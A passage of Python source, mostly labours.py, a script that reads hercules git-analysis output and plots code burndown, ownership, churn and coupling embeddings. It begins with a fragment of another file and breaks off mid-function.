nfiles = glob(os.path.join(self._path, '*.png'))
if nfiles:
self.dir_changed = nfiles
time.sleep(period)
# ============= EOF =============================================
|
labours.py | #!/usr/bin/env python3
import argparse
from datetime import datetime, timedelta
from importlib import import_module
import io
import json
import os
import re
import shutil
import sys
import tempfile
import threading
import time
import warnings
try:
from clint.textui import progress
except ImportError:
print("Warning: clint is not installed, no fancy progressbars in the terminal for you.")
progress = None
import numpy
import yaml
if sys.version_info[0] < 3:
# OK, ancients, I will support Python 2, but you owe me a beer
input = raw_input # noqa: F821
PB_MESSAGES = {
"Burndown": "internal.pb.pb_pb2.BurndownAnalysisResults",
"Couples": "internal.pb.pb_pb2.CouplesAnalysisResults",
"Shotness": "internal.pb.pb_pb2.ShotnessAnalysisResults",
}
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--output", default="",
help="Path to the output file/directory (empty for display). "
"If the extension is JSON, the data is saved instead of "
"the real image.")
parser.add_argument("-i", "--input", default="-",
help="Path to the input file (- for stdin).")
parser.add_argument("-f", "--input-format", default="auto", choices=["yaml", "pb", "auto"])
parser.add_argument("--text-size", default=12, type=int,
help="Size of the labels and legend.")
parser.add_argument("--backend", help="Matplotlib backend to use.")
parser.add_argument("--style", choices=["black", "white"], default="black",
help="Plot's general color scheme.")
parser.add_argument("--size", help="Axes' size in inches, for example \"12,9\"")
parser.add_argument("--relative", action="store_true",
help="Occupy 100%% height for every measurement.")
parser.add_argument("--couples-tmp-dir", help="Temporary directory to work with couples.")
parser.add_argument("-m", "--mode",
choices=["project", "file", "person", "churn_matrix", "ownership",
"couples", "shotness", "sentiment", "all", "run_times"],
help="What to plot.")
parser.add_argument(
"--resample", default="year",
help="The way to resample the time series. Possible values are: "
"\"month\", \"year\", \"no\", \"raw\" and pandas offset aliases ("
"http://pandas.pydata.org/pandas-docs/stable/timeseries.html"
"#offset-aliases).")
parser.add_argument("--disable-projector", action="store_true",
help="Do not run Tensorflow Projector on couples.")
parser.add_argument("--max-people", default=20, type=int,
help="Maximum number of developers in churn matrix and people plots.")
args = parser.parse_args()
return args
class Reader(object):
def read(self, file):
raise NotImplementedError
def get_name(self):
raise NotImplementedError
def get_header(self):
raise NotImplementedError
def get_burndown_parameters(self):
raise NotImplementedError
def get_project_burndown(self):
raise NotImplementedError
def get_files_burndown(self):
raise NotImplementedError
def get_people_burndown(self):
raise NotImplementedError
def get_ownership_burndown(self):
raise NotImplementedError
def get_people_interaction(self):
raise NotImplementedError
def get_files_coocc(self):
raise NotImplementedError
def get_people_coocc(self):
raise NotImplementedError
def get_shotness_coocc(self):
raise NotImplementedError
def get_shotness(self):
raise NotImplementedError
class YamlReader(Reader):
def read(self, file):
yaml.reader.Reader.NON_PRINTABLE = re.compile(r"(?!x)x")
try:
loader = yaml.CLoader
except AttributeError:
print("Warning: failed to import yaml.CLoader, falling back to slow yaml.Loader")
loader = yaml.Loader
try:
if file != "-":
with open(file) as fin:
data = yaml.load(fin, Loader=loader)
else:
data = yaml.load(sys.stdin, Loader=loader)
except (UnicodeEncodeError, yaml.reader.ReaderError) as e:
print("\nInvalid unicode in the input: %s\nPlease filter it through "
"fix_yaml_unicode.py" % e)
sys.exit(1)
self.data = data
def get_run_times(self):
return {}
def get_name(self):
return self.data["hercules"]["repository"]
def get_header(self):
header = self.data["hercules"]
return header["begin_unix_time"], header["end_unix_time"]
def get_burndown_parameters(self):
header = self.data["Burndown"]
return header["sampling"], header["granularity"]
def get_project_burndown(self):
return self.data["hercules"]["repository"], \
self._parse_burndown_matrix(self.data["Burndown"]["project"]).T
def get_files_burndown(self):
return [(p[0], self._parse_burndown_matrix(p[1]).T)
for p in self.data["Burndown"]["files"].items()]
def get_people_burndown(self):
return [(p[0], self._parse_burndown_matrix(p[1]).T)
for p in self.data["Burndown"]["people"].items()]
def get_ownership_burndown(self):
return self.data["Burndown"]["people_sequence"].copy(),\
{p[0]: self._parse_burndown_matrix(p[1])
for p in self.data["Burndown"]["people"].items()}
def get_people_interaction(self):
return self.data["Burndown"]["people_sequence"].copy(), \
self._parse_burndown_matrix(self.data["Burndown"]["people_interaction"])
def get_files_coocc(self):
coocc = self.data["Couples"]["files_coocc"]
return coocc["index"], self._parse_coocc_matrix(coocc["matrix"])
def get_people_coocc(self):
coocc = self.data["Couples"]["people_coocc"]
return coocc["index"], self._parse_coocc_matrix(coocc["matrix"])
def get_shotness_coocc(self):
shotness = self.data["Shotness"]
index = ["%s:%s" % (i["file"], i["name"]) for i in shotness]
indptr = numpy.zeros(len(shotness) + 1, dtype=numpy.int64)
indices = []
data = []
for i, record in enumerate(shotness):
pairs = [(int(k), v) for k, v in record["counters"].items()]
pairs.sort()
indptr[i + 1] = indptr[i] + len(pairs)
for k, v in pairs:
indices.append(k)
data.append(v)
indices = numpy.array(indices, dtype=numpy.int32)
data = numpy.array(data, dtype=numpy.int32)
from scipy.sparse import csr_matrix
return index, csr_matrix((data, indices, indptr), shape=(len(shotness),) * 2)
def get_shotness(self):
from munch import munchify
obj = munchify(self.data["Shotness"])
# turn strings into ints
for item in obj:
item.counters = {int(k): v for k, v in item.counters.items()}
if len(obj) == 0:
raise KeyError
return obj
def get_sentiment(self):
from munch import munchify
return munchify({int(key): {
"Comments": vals[2].split("|"),
"Commits": vals[1],
"Value": float(vals[0])
} for key, vals in self.data["Sentiment"].items()})
def _parse_burndown_matrix(self, matrix):
return numpy.array([numpy.fromstring(line, dtype=int, sep=" ")
for line in matrix.split("\n")])
def _parse_coocc_matrix(self, matrix):
from scipy.sparse import csr_matrix
data = []
indices = []
indptr = [0]
for row in matrix:
for k, v in sorted(row.items()):
data.append(v)
indices.append(k)
indptr.append(indptr[-1] + len(row))
return csr_matrix((data, indices, indptr), shape=(len(matrix),) * 2)
class ProtobufReader(Reader):
def read(self, file):
try:
from internal.pb.pb_pb2 import AnalysisResults
except ImportError as e:
print("\n\n>>> You need to generate internal/pb/pb_pb2.py - run \"make\"\n",
file=sys.stderr)
raise e from None
self.data = AnalysisResults()
if file != "-":
with open(file, "rb") as fin:
self.data.ParseFromString(fin.read())
else:
self.data.ParseFromString(sys.stdin.buffer.read())
self.contents = {}
for key, val in self.data.contents.items():
try:
mod, name = PB_MESSAGES[key].rsplit(".", 1)
except KeyError:
sys.stderr.write("Warning: there is no registered PB decoder for %s\n" % key)
continue
cls = getattr(import_module(mod), name)
self.contents[key] = msg = cls()
msg.ParseFromString(val)
def get_run_times(self):
return {key: val for key, val in self.data.header.run_time_per_item.items()}
def get_name(self):
return self.data.header.repository
def get_header(self):
header = self.data.header
return header.begin_unix_time, header.end_unix_time
def get_burndown_parameters(self):
burndown = self.contents["Burndown"]
return burndown.sampling, burndown.granularity
def get_project_burndown(self):
return self._parse_burndown_matrix(self.contents["Burndown"].project)
def get_files_burndown(self):
return [self._parse_burndown_matrix(i) for i in self.contents["Burndown"].files]
def get_people_burndown(self):
return [self._parse_burndown_matrix(i) for i in self.contents["Burndown"].people]
def get_ownership_burndown(self):
people = self.get_people_burndown()
return [p[0] for p in people], {p[0]: p[1].T for p in people}
def get_people_interaction(self):
burndown = self.contents["Burndown"]
return [i.name for i in burndown.people], \
self._parse_sparse_matrix(burndown.people_interaction).toarray()
def get_files_coocc(self):
node = self.contents["Couples"].file_couples
return list(node.index), self._parse_sparse_matrix(node.matrix)
def get_people_coocc(self):
node = self.contents["Couples"].people_couples
return list(node.index), self._parse_sparse_matrix(node.matrix)
def get_shotness_coocc(self):
shotness = self.get_shotness()
index = ["%s:%s" % (i.file, i.name) for i in shotness]
indptr = numpy.zeros(len(shotness) + 1, dtype=numpy.int32)
indices = []
data = []
for i, record in enumerate(shotness):
pairs = list(record.counters.items())
pairs.sort()
indptr[i + 1] = indptr[i] + len(pairs)
for k, v in pairs:
indices.append(k)
data.append(v)
indices = numpy.array(indices, dtype=numpy.int32)
data = numpy.array(data, dtype=numpy.int32)
from scipy.sparse import csr_matrix
return index, csr_matrix((data, indices, indptr), shape=(len(shotness),) * 2)
def get_shotness(self):
records = self.contents["Shotness"].records
if len(records) == 0:
raise KeyError
return records
def get_sentiment(self):
byday = self.contents["Sentiment"].SentimentByDay
if len(byday) == 0:
raise KeyError
return byday
def _parse_burndown_matrix(self, matrix):
dense = numpy.zeros((matrix.number_of_rows, matrix.number_of_columns), dtype=int)
for y, row in enumerate(matrix.rows):
for x, col in enumerate(row.columns):
dense[y, x] = col
return matrix.name, dense.T
def _parse_sparse_matrix(self, matrix):
from scipy.sparse import csr_matrix
return csr_matrix((list(matrix.data), list(matrix.indices), list(matrix.indptr)),
shape=(matrix.number_of_rows, matrix.number_of_columns))
READERS = {"yaml": YamlReader, "yml": YamlReader, "pb": ProtobufReader}
def read_input(args):
sys.stdout.write("Reading the input... ")
sys.stdout.flush()
if args.input != "-":
if args.input_format == "auto":
args.input_format = args.input.rsplit(".", 1)[1]
elif args.input_format == "auto":
args.input_format = "yaml"
reader = READERS[args.input_format]()
reader.read(args.input)
print("done")
return reader
def calculate_average_lifetime(matrix):
lifetimes = numpy.zeros(matrix.shape[1] - 1)
for band in matrix:
start = 0
for i, line in enumerate(band):
if i == 0 or band[i - 1] == 0:
start += 1
continue
lifetimes[i - start] = band[i - 1] - line
lifetimes[i - start] = band[i - 1]
lsum = lifetimes.sum()
if lsum != 0:
return (lifetimes.dot(numpy.arange(1, matrix.shape[1], 1))
/ (lsum * matrix.shape[1]))
return numpy.nan
def interpolate_burndown_matrix(matrix, granularity, sampling):
daily = numpy.zeros(
(matrix.shape[0] * granularity, matrix.shape[1] * sampling),
dtype=numpy.float32)
"""
----------> samples, x
|
|
|
⌄
bands, y
"""
for y in range(matrix.shape[0]):
for x in range(matrix.shape[1]):
if y * granularity > (x + 1) * sampling:
# the future is zeros
continue
def decay(start_index: int, start_val: float):
if start_val == 0:
return
k = matrix[y][x] / start_val # <= 1
scale = (x + 1) * sampling - start_index
for i in range(y * granularity, (y + 1) * granularity):
initial = daily[i][start_index - 1]
for j in range(start_index, (x + 1) * sampling):
daily[i][j] = initial * (
1 + (k - 1) * (j - start_index + 1) / scale)
def grow(finish_index: int, finish_val: float):
initial = matrix[y][x - 1] if x > 0 else 0
start_index = x * sampling
if start_index < y * granularity:
start_index = y * granularity
if finish_index == start_index:
return
avg = (finish_val - initial) / (finish_index - start_index)
for j in range(x * sampling, finish_index):
for i in range(start_index, j + 1):
daily[i][j] = avg
# copy [x*g..y*s)
for j in range(x * sampling, finish_index):
for i in range(y * granularity, x * sampling):
daily[i][j] = daily[i][j - 1]
if (y + 1) * granularity >= (x + 1) * sampling:
# x*granularity <= (y+1)*sampling
# 1. x*granularity <= y*sampling
# y*sampling..(y+1)sampling
#
# x+1
# /
# /
# / y+1 -|
# / |
# / y -|
# /
# / x
#
# 2. x*granularity > y*sampling
# x*granularity..(y+1)sampling
#
# x+1
# /
# /
# / y+1 -|
# / |
# / x -|
# /
# / y
if y * granularity <= x * sampling:
grow((x + 1) * sampling, matrix[y][x])
elif (x + 1) * sampling > y * granularity:
grow((x + 1) * sampling, matrix[y][x])
avg = matrix[y][x] / ((x + 1) * sampling - y * granularity)
for j in range(y * granularity, (x + 1) * sampling):
for i in range(y * granularity, j + 1):
daily[i][j] = avg
elif (y + 1) * granularity >= x * sampling:
# y*sampling <= (x+1)*granularity < (y+1)sampling
# y*sampling..(x+1)*granularity
# (x+1)*granularity..(y+1)sampling
# x+1
# /\
# / \
# / \
# / y+1
# /
# y
v1 = matrix[y][x - 1]
v2 = matrix[y][x]
delta = (y + 1) * granularity - x * sampling
previous = 0
if x > 0 and (x - 1) * sampling >= y * granularity:
# x*g <= (y-1)*s <= y*s <= (x+1)*g <= (y+1)*s
# |________|.......^
if x > 1:
previous = matrix[y][x - 2]
scale = sampling
else:
# (y-1)*s < x*g <= y*s <= (x+1)*g <= (y+1)*s
# |______|.......^
scale = sampling if x == 0 else x * sampling - y * granularity
peak = v1 + (v1 - previous) / scale * delta
if v2 > peak:
# we need to adjust the peak, it may not be less than the decayed value
if x < matrix.shape[1] - 1:
# y*s <= (x+1)*g <= (y+1)*s < (y+2)*s
# ^.........|_________|
k = (v2 - matrix[y][x + 1]) / sampling # > 0
peak = matrix[y][x] + k * ((x + 1) * sampling - (y + 1) * granularity)
# peak > v2 > v1
else:
peak = v2
# not enough data to interpolate; this is at least not restricted
grow((y + 1) * granularity, peak)
decay((y + 1) * granularity, peak)
else:
# (x+1)*granularity < y*sampling
# y*sampling..(y+1)sampling
decay(x * sampling, matrix[y][x - 1])
return daily
def load_burndown(header, name, matrix, resample):
import pandas
start, last, sampling, granularity = header
assert sampling > 0
assert granularity >= sampling
start = datetime.fromtimestamp(start)
last = datetime.fromtimestamp(last)
print(name, "lifetime index:", calculate_average_lifetime(matrix))
finish = start + timedelta(days=matrix.shape[1] * sampling)
if resample not in ("no", "raw"):
print("resampling to %s, please wait..." % resample)
# Interpolate the day x day matrix.
# Each day brings equal weight in the granularity.
# Sampling's interpolation is linear.
daily = interpolate_burndown_matrix(matrix, granularity, sampling)
daily[(last - start).days:] = 0
# Resample the bands
aliases = {
"year": "A",
"month": "M"
}
resample = aliases.get(resample, resample)
periods = 0
date_granularity_sampling = [start]
while date_granularity_sampling[-1] < finish:
periods += 1
date_granularity_sampling = pandas.date_range(
start, periods=periods, freq=resample)
date_range_sampling = pandas.date_range(
date_granularity_sampling[0],
periods=(finish - date_granularity_sampling[0]).days,
freq="1D")
# Fill the new square matrix
matrix = numpy.zeros(
(len(date_granularity_sampling), len(date_range_sampling)),
dtype=numpy.float32)
for i, gdt in enumerate(date_granularity_sampling):
istart = (date_granularity_sampling[i - 1] - start).days \
if i > 0 else 0
ifinish = (gdt - start).days
for j, sdt in enumerate(date_range_sampling):
if (sdt - start).days >= istart:
break
matrix[i, j:] = \
daily[istart:ifinish, (sdt - start).days:].sum(axis=0)
# Hardcode some cases to improve labels' readability
if resample in ("year", "A"):
labels = [dt.year for dt in date_granularity_sampling]
elif resample in ("month", "M"):
labels = [dt.strftime("%Y %B") for dt in date_granularity_sampling]
else:
labels = [dt.date() for dt in date_granularity_sampling]
else:
labels = [
"%s - %s" % ((start + timedelta(days=i * granularity)).date(),
(
start + timedelta(days=(i + 1) * granularity)).date())
for i in range(matrix.shape[0])]
if len(labels) > 18:
warnings.warn("Too many labels - consider resampling.")
resample = "M" # fake resampling type is checked while plotting
date_range_sampling = pandas.date_range(
start + timedelta(days=sampling), periods=matrix.shape[1],
freq="%dD" % sampling)
return name, matrix, date_range_sampling, labels, granularity, sampling, resample
def load_ownership(header, sequence, contents, max_people):
import pandas
start, last, sampling, _ = header
start = datetime.fromtimestamp(start)
last = datetime.fromtimestamp(last)
people = []
for name in sequence:
people.append(contents[name].sum(axis=1))
people = numpy.array(people)
date_range_sampling = pandas.date_range(
start + timedelta(days=sampling), periods=people[0].shape[0],
freq="%dD" % sampling)
if people.shape[0] > max_people:
order = numpy.argsort(-people.sum(axis=1))
people = people[order[:max_people]]
sequence = [sequence[i] for i in order[:max_people]]
print("Warning: truncated people to most owning %d" % max_people)
for i, name in enumerate(sequence):
if len(name) > 40:
sequence[i] = name[:37] + "..."
return sequence, people, date_range_sampling, last
def load_churn_matrix(people, matrix, max_people):
matrix = matrix.astype(float)
if matrix.shape[0] > max_people:
order = numpy.argsort(-matrix[:, 0])
matrix = matrix[order[:max_people]][:, [0, 1] + list(2 + order[:max_people])]
people = [people[i] for i in order[:max_people]]
print("Warning: truncated people to most productive %d" % max_people)
zeros = matrix[:, 0] == 0
matrix[zeros, :] = 1
matrix /= matrix[:, 0][:, None]
matrix = -matrix[:, 1:]
matrix[zeros, :] = 0
for i, name in enumerate(people):
if len(name) > 40:
people[i] = name[:37] + "..."
return people, matrix
def apply_plot_style(figure, axes, legend, style, text_size, axes_size):
if axes_size is None:
axes_size = (12, 9)
else:
axes_size = tuple(float(p) for p in axes_size.split(","))
figure.set_size_inches(*axes_size)
for side in ("bottom", "top", "left", "right"):
axes.spines[side].set_color(style)
for axis in (axes.xaxis, axes.yaxis):
axis.label.update(dict(fontsize=text_size, color=style))
for axis in ("x", "y"):
getattr(axes, axis + "axis").get_offset_text().set_size(text_size)
axes.tick_params(axis=axis, colors=style, labelsize=text_size)
try:
axes.ticklabel_format(axis="y", style="sci", scilimits=(0, 3))
except AttributeError:
pass
if legend is not None:
frame = legend.get_frame()
for setter in (frame.set_facecolor, frame.set_edgecolor):
setter("black" if style == "white" else "white")
for text in legend.get_texts():
text.set_color(style)
def get_plot_path(base, name):
root, ext = os.path.splitext(base)
if not ext:
ext = ".png"
output = os.path.join(root, name + ext)
os.makedirs(os.path.dirname(output), exist_ok=True)
return output
def deploy_plot(title, output, style):
import matplotlib.pyplot as pyplot
if not output:
pyplot.gcf().canvas.set_window_title(title)
pyplot.show()
else:
if title:
pyplot.title(title, color=style)
try:
pyplot.tight_layout()
except: # noqa: E722
print("Warning: failed to set the tight layout")
pyplot.savefig(output, transparent=True)
pyplot.clf()
def default_json(x):
if hasattr(x, "tolist"):
return x.tolist()
if hasattr(x, "isoformat"):
return x.isoformat()
return x
def plot_burndown(args, target, name, matrix, date_range_sampling, labels, granularity,
sampling, resample):
if args.output and args.output.endswith(".json"):
data = locals().copy()
del data["args"]
data["type"] = "burndown"
if args.mode == "project" and target == "project":
output = args.output
else:
if target == "project":
name = "project"
output = get_plot_path(args.output, name)
with open(output, "w") as fout:
json.dump(data, fout, sort_keys=True, default=default_json)
return
import matplotlib
if args.backend:
matplotlib.use(args.backend)
import matplotlib.pyplot as pyplot
pyplot.stackplot(date_range_sampling, matrix, labels=labels)
if args.relative:
for i in range(matrix.shape[1]):
matrix[:, i] /= matrix[:, i].sum()
pyplot.ylim(0, 1)
legend_loc = 3
else:
legend_loc = 2
legend = pyplot.legend(loc=legend_loc, fontsize=args.text_size)
pyplot.ylabel("Lines of code")
pyplot.xlabel("Time")
apply_plot_style(pyplot.gcf(), pyplot.gca(), legend, args.style, args.text_size, args.size)
pyplot.xlim(date_range_sampling[0], date_range_sampling[-1])
locator = pyplot.gca().xaxis.get_major_locator()
# set the optimal xticks locator
if "M" not in resample:
pyplot.gca().xaxis.set_major_locator(matplotlib.dates.YearLocator())
locs = pyplot.gca().get_xticks().tolist()
if len(locs) >= 16:
pyplot.gca().xaxis.set_major_locator(matplotlib.dates.YearLocator())
locs = pyplot.gca().get_xticks().tolist()
if len(locs) >= 16:
pyplot.gca().xaxis.set_major_locator(locator)
if locs[0] < pyplot.xlim()[0]:
del locs[0]
endindex = -1
if len(locs) >= 2 and pyplot.xlim()[1] - locs[-1] > (locs[-1] - locs[-2]) / 2:
locs.append(pyplot.xlim()[1])
endindex = len(locs) - 1
startindex = -1
if len(locs) >= 2 and locs[0] - pyplot.xlim()[0] > (locs[1] - locs[0]) / 2:
locs.append(pyplot.xlim()[0])
startindex = len(locs) - 1
pyplot.gca().set_xticks(locs)
# hacking time!
labels = pyplot.gca().get_xticklabels()
if startindex >= 0:
labels[startindex].set_text(date_range_sampling[0].date())
labels[startindex].set_text = lambda _: None
labels[startindex].set_rotation(30)
labels[startindex].set_ha("right")
if endindex >= 0:
labels[endindex].set_text(date_range_sampling[-1].date())
labels[endindex].set_text = lambda _: None
labels[endindex].set_rotation(30)
labels[endindex].set_ha("right")
title = "%s %d x %d (granularity %d, sampling %d)" % \
((name,) + matrix.shape + (granularity, sampling))
output = args.output
if output:
if args.mode == "project" and target == "project":
output = args.output
else:
if target == "project":
name = "project"
output = get_plot_path(args.output, name)
deploy_plot(title, output, args.style)
def plot_many_burndown(args, target, header, parts):
if not args.output:
print("Warning: output not set, showing %d plots." % len(parts))
itercnt = progress.bar(parts, expected_size=len(parts)) \
if progress is not None else parts
stdout = io.StringIO()
for name, matrix in itercnt:
backup = sys.stdout
sys.stdout = stdout
plot_burndown(args, target, *load_burndown(header, name, matrix, args.resample))
sys.stdout = backup
sys.stdout.write(stdout.getvalue())
def plot_churn_matrix(args, repo, people, matrix):
if args.output and args.output.endswith(".json"):
data = locals().copy()
del data["args"]
data["type"] = "churn_matrix"
if args.mode == "all":
output = get_plot_path(args.output, "matrix")
else:
output = args.output
with open(output, "w") as fout:
json.dump(data, fout, sort_keys=True, default=default_json)
return
import matplotlib
if args.backend:
matplotlib.use(args.backend)
import matplotlib.pyplot as pyplot
s = 4 + matrix.shape[1] * 0.3
fig = pyplot.figure(figsize=(s, s))
ax = fig.add_subplot(111)
ax.xaxis.set_label_position("top")
ax.matshow(matrix, cmap=pyplot.cm.OrRd)
ax.set_xticks(numpy.arange(0, matrix.shape[1]))
ax.set_yticks(numpy.arange(0, matrix.shape[0]))
ax.set_yticklabels(people, va="center")
ax.set_xticks(numpy.arange(0.5, matrix.shape[1] + 0.5), minor=True)
ax.set_xticklabels(["Unidentified"] + people, rotation=45, ha="left",
va="bottom", rotation_mode="anchor")
ax.set_yticks(numpy.arange(0.5, matrix.shape[0] + 0.5), minor=True)
ax.grid(which="minor")
apply_plot_style(fig, ax, None, args.style, args.text_size, args.size)
if not args.output:
pos1 = ax.get_position()
pos2 = (pos1.x0 + 0.15, pos1.y0 - 0.1, pos1.width * 0.9, pos1.height * 0.9)
ax.set_position(pos2)
if args.mode == "all":
output = get_plot_path(args.output, "matrix")
else:
output = args.output
title = "%s %d developers overwrite" % (repo, matrix.shape[0])
if args.output:
# FIXME(vmarkovtsev): otherwise the title is screwed in savefig()
title = ""
deploy_plot(title, output, args.style)
def plot_ownership(args, repo, names, people, date_range, last):
if args.output and args.output.endswith(".json"):
data = locals().copy()
del data["args"]
data["type"] = "ownership"
if args.mode == "all":
output = get_plot_path(args.output, "people")
else:
output = args.output
with open(output, "w") as fout:
json.dump(data, fout, sort_keys=True, default=default_json)
return
import matplotlib
if args.backend:
matplotlib.use(args.backend)
import matplotlib.pyplot as pyplot
pyplot.stackplot(date_range, people, labels=names)
pyplot.xlim(date_range[0], last)
if args.relative:
for i in range(people.shape[1]):
people[:, i] /= people[:, i].sum()
pyplot.ylim(0, 1)
legend_loc = 3
else:
legend_loc = 2
legend = pyplot.legend(loc=legend_loc, fontsize=args.text_size)
apply_plot_style(pyplot.gcf(), pyplot.gca(), legend, args.style, args.text_size, args.size)
if args.mode == "all":
output = get_plot_path(args.output, "people")
else:
output = args.output
deploy_plot("%s code ownership through time" % repo, output, args.style)
IDEAL_SHARD_SIZE = 4096
def train_embeddings(index, matrix, tmpdir, shard_size=IDEAL_SHARD_SIZE):
try:
from . import swivel
except (SystemError, ImportError):
import swivel
import tensorflow as tf
assert matrix.shape[0] == matrix.shape[1]
assert len(index) <= matrix.shape[0]
outlier_threshold = numpy.percentile(matrix.data, 99)
matrix.data[matrix.data > outlier_threshold] = outlier_threshold
nshards = len(index) // shard_size
if nshards * shard_size < len(index):
nshards += 1
shard_size = len(index) // nshards
nshards = len(index) // shard_size
remainder = len(index) - nshards * shard_size
if remainder > 0:
lengths = matrix.indptr[1:] - matrix.indptr[:-1]
filtered = sorted(numpy.argsort(lengths)[remainder:])
else:
filtered = list(range(len(index)))
if len(filtered) < matrix.shape[0]:
print("Truncating the sparse matrix...")
matrix = matrix[filtered, :][:, filtered]
meta_index = []
for i, j in enumerate(filtered):
meta_index.append((index[j], matrix[i, i]))
index = [mi[0] for mi in meta_index]
with tempfile.TemporaryDirectory(prefix="hercules_labours_", dir=tmpdir or None) as tmproot:
print("Writing Swivel metadata...")
vocabulary = "\n".join(index)
with open(os.path.join(tmproot, "row_vocab.txt"), "w") as out:
out.write(vocabulary)
with open(os.path.join(tmproot, "col_vocab.txt"), "w") as out:
out.write(vocabulary)
del vocabulary
bool_sums = matrix.indptr[1:] - matrix.indptr[:-1]
bool_sums_str = "\n".join(map(str, bool_sums.tolist()))
with open(os.path.join(tmproot, "row_sums.txt"), "w") as out:
out.write(bool_sums_str)
with open(os.path.join(tmproot, "col_sums.txt"), "w") as out:
out.write(bool_sums_str)
del bool_sums_str
reorder = numpy.argsort(-bool_sums)
print("Writing Swivel shards...")
for row in range(nshards):
for col in range(nshards):
def _int64s(xs):
return tf.train.Feature(
int64_list=tf.train.Int64List(value=list(xs)))
def _floats(xs):
return tf.train.Feature(
float_list=tf.train.FloatList(value=list(xs)))
indices_row = reorder[row::nshards]
indices_col = reorder[col::nshards]
shard = matrix[indices_row][:, indices_col].tocoo()
example = tf.train.Example(features=tf.train.Features(feature={
"global_row": _int64s(indices_row),
"global_col": _int64s(indices_col),
"sparse_local_row": _int64s(shard.row),
"sparse_local_col": _int64s(shard.col),
"sparse_value": _floats(shard.data)}))
with open(os.path.join(tmproot, "shard-%03d-%03d.pb" % (row, col)), "wb") as out:
out.write(example.SerializeToString())
print("Training Swivel model...")
swivel.FLAGS.submatrix_rows = shard_size
swivel.FLAGS.submatrix_cols = shard_size
if len(meta_index) <= IDEAL_SHARD_SIZE / 16:
embedding_size = 50
num_epochs = 100000
elif len(meta_index) <= IDEAL_SHARD_SIZE:
embedding_size = 50
num_epochs = 50000
elif len(meta_index) <= IDEAL_SHARD_SIZE * 2:
embedding_size = 60
num_epochs = 10000
elif len(meta_index) <= IDEAL_SHARD_SIZE * 4:
embedding_size = 70
num_epochs = 8000
elif len(meta_index) <= IDEAL_SHARD_SIZE * 10:
embedding_size = 80
num_epochs = 5000
elif len(meta_index) <= IDEAL_SHARD_SIZE * 25:
embedding_size = 100
num_epochs = 1000
elif len(meta_index) <= IDEAL_SHARD_SIZE * 100:
embedding_size = 200
num_epochs = 600
else:
embedding_size = 300
num_epochs = 300
if os.getenv("CI"):
# Travis, AppVeyor etc. during the integration tests
num_epochs /= 10
swivel.FLAGS.embedding_size = embedding_size
swivel.FLAGS.input_base_path = tmproot
swivel.FLAGS.output_base_path = tmproot
swivel.FLAGS.loss_multiplier = 1.0 / shard_size
swivel.FLAGS.num_epochs = num_epochs
# Tensorflow 1.5 parses sys.argv unconditionally *applause*
argv_backup = sys.argv[1:]
del sys.argv[1:]
swivel.main(None)
sys.argv.extend(argv_backup)
print("Reading Swivel embeddings...")
embeddings = []
with open(os.path.join(tmproot, "row_embedding.tsv")) as frow:
with open(os.path.join(tmproot, "col_embedding.tsv")) as fcol:
for i, (lrow, lcol) in enumerate(zip(frow, fcol)):
prow, pcol = (l.split("\t", 1) for l in (lrow, lcol))
assert prow[0] == pcol[0]
erow, ecol = \
(numpy.fromstring(p[1], dtype=numpy.float32, sep="\t")
for p in (prow, pcol))
embeddings.append((erow + ecol) / 2)
return meta_index, embeddings
class CORSWebServer(object):
def __init__(self):
self.thread = threading.Thread(target=self.serve)
self.server = None
def serve(self):
outer = self
try:
from http.server import HTTPServer, SimpleHTTPRequestHandler, test
except ImportError: # Python 2
from BaseHTTPServer import HTTPServer, test
from SimpleHTTPServer import SimpleHTTPRequestHandler
class ClojureServer(HTTPServer):
def __init__(self, *args, **kwargs):
HTTPServer.__init__(self, *args, **kwargs)
outer.server = self
class CORSRequestHandler(SimpleHTTPRequestHandler):
def end_headers(self):
self.send_header("Access-Control-Allow-Origin", "*")
SimpleHTTPRequestHandler.end_headers(self)
test(CORSRequestHandler, ClojureServer)
def start(self):
self.thread.start()
def stop(self):
if self.running:
self.server.shutdown()
self.thread.join()
@property
def running(self):
return self.server is not None
web_server = CORSWebServer()
def write_embeddings(name, output, run_server, index, embeddings):
print("Writing Tensorflow Projector files...")
if not output:
output = "couples_" + name
if output.endswith(".json"):
output = os.path.join(output[:-5], "couples")
run_server = False
metaf = "%s_%s_meta.tsv" % (output, name)
with open(metaf, "w") as fout:
fout.write("name\tcommits\n")
for pair in index:
fout.write("%s\t%s\n" % pair)
print("Wrote", metaf)
dataf = "%s_%s_data.tsv" % (output, name)
with open(dataf, "w") as fout:
for vec in embeddings:
fout.write("\t".join(str(v) for v in vec))
fout.write("\n")
print("Wrote", dataf)
jsonf = "%s_%s.json" % (output, name)
with open(jsonf, "w") as fout:
fout.write("""{
"embeddings": [
{
"tensorName": "%s %s coupling",
"tensorShape": [%s, %s],
"tensorPath": "http://0.0.0.0:8000/%s",
"metadataPath": "http://0.0.0.0:8000/%s"
}
]
}
""" % (output, name, len(embeddings), len(embeddings[0]), dataf, metaf))
print("Wrote %s" % jsonf)
if run_server and not web_server.running:
web_server.start()
url = "http://projector.tensorflow.org/?config=http://0.0.0.0:8000/" + jsonf
print(url)
if run_server:
if shutil.which("xdg-open") is not None:
os.system("xdg-open " + url)
else:
browser = os.getenv("BROWSER", "")
if browser:
os.system(browser + " " + url)
else:
print("\t" + url)
def show_shotness_stats(data):
top = sorted(((r.counters[i], i) for i, r in enumerate(data)), reverse=True)
for count, i in top:
r = data[i]
print("%8d %s:%s [%s]" % (count, r.file, r.name, r.internal_role))
def show_sentiment_stats(args, name, resample, start, data):
import matplotlib
if args.backend:
matplotlib.use(args.backend)
import matplotlib.pyplot as pyplot
start = datetime.fromtimestamp(start)
data = sorted(data.items())
xdates = [start + timedelta(days=d[0]) for d in data]
xpos = []
ypos = []
xneg = []
yneg = []
for x, (_, y) in zip(xdates, data):
y = 0.5 - y.Value
if y > 0:
xpos.append(x)
ypos.append(y)
else:
xneg.append(x)
yneg.append(y)
pyplot.bar(xpos, ypos, color="g", label="Positive")
pyplot.bar(xneg, yneg, color="r", label="Negative")
legend = pyplot.legend(loc=1, fontsize=args.text_size)
pyplot.ylabel("Lines of code")
pyplot.xlabel("Time")
apply_plot_style(pyplot.gcf(), pyplot.gca(), legend, args.style, args.text_size, args.size)
pyplot.xlim(xdates[0], xdates[-1])
locator = pyplot.gca().xaxis.get_major_locator()
# set the optimal xticks locator
if "M" not in resample:
pyplot.gca().xaxis.set_major_locator(matplotlib.dates.YearLocator())
locs = pyplot.gca().get_xticks().tolist()
if len(locs) >= 16:
pyplot.gca().xaxis.set_major_locator(matplotlib.dates.YearLocator())
